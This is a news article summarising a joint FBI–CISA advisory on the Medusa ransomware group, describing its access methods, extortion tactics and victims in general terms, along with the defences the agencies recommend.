FBI and CISA warn of Medusa ransomware attacks impacting critical infrastructure. Learn about Medusa’s tactics, prevention tips, and why paying ransoms is discouraged.
A joint advisory by the Federal Bureau of Investigation (FBI) and the Cybersecurity and Infrastructure Security Agency (CISA) has revealed a particularly aggressive digital threat- a criminal operation, known as the Medusa ransomware gang.
According to the advisory (#StopRansomware: Medusa Ransomware), Medusa, a ransomware-as-a-service (RaaS) group first identified in June 2021, has become a serious threat to critical infrastructure sectors in the United States.
Authorities have identified a pattern of attacks affecting organizations across diverse sectors, including healthcare, education, law firms, insurance providers, technology companies, and manufacturers. Their victims include Bell Ambulance in Wisconsin, CPI Books, Customer Management Systems, and Heartland Health Center. The sheer number of victims, surpassing 300 as of December 2024, highlights the scope of this threat.
The actors utilize different methods to infiltrate systems, including deceptive communications (phishing) and exploiting unpatched software vulnerabilities (e.g. ScreenConnect authentication bypass CVE-2024-1709). Once inside a network, they use legitimate system administration tools to move undetected.
They employ a unique approach to extortion, which involves encrypting victims’ data and rendering it inaccessible, along with threatening to expose sensitive information if their demands are not met. This tactic creates immense pressure on targeted organizations, forcing them to consider paying the ransom to prevent public disclosure of their data.
“Medusa developers typically recruit initial access brokers (IABs) in cybercriminal forums and marketplaces to obtain initial access to potential victims. Potential payments between $100 USD and $1 million USD are offered to these affiliates with the opportunity to work exclusively for Medusa,” the advisory (PDF) warns.
Medusa uses advanced techniques to conceal its activities, such as remote access software to control compromised systems and using encrypted scripts and tools to create hidden connections to its command servers, thereby evading security software detection.
A particularly concerning aspect of this operation is the aggressive nature of their extortion tactics. Victims are given a very short window of time to pay the ransom, often just two days. They are pressured through direct communication, and if they fail to comply, their stolen data is made available on darknet websites. There are even reports that paying the initial ransom might not guarantee the end of the ordeal, as further demands may follow.
In response to this growing threat, federal agencies have emphasized the need for ensuring regular software updates, implementing reliable access controls, and using multi-factor authentication. They also advise monitoring network activity for suspicious behaviour, limiting the use of remote desktop protocols, and segmenting networks to contain any potential breaches.
Moreover, users are urged to enable two-factor authentication (2FA) for webmail and VPNs as social engineering is a significant factor in these attacks. All organizations affected by the Medusa ransomware are requested to report the incidents to law enforcement and to avoid paying any ransom demands.
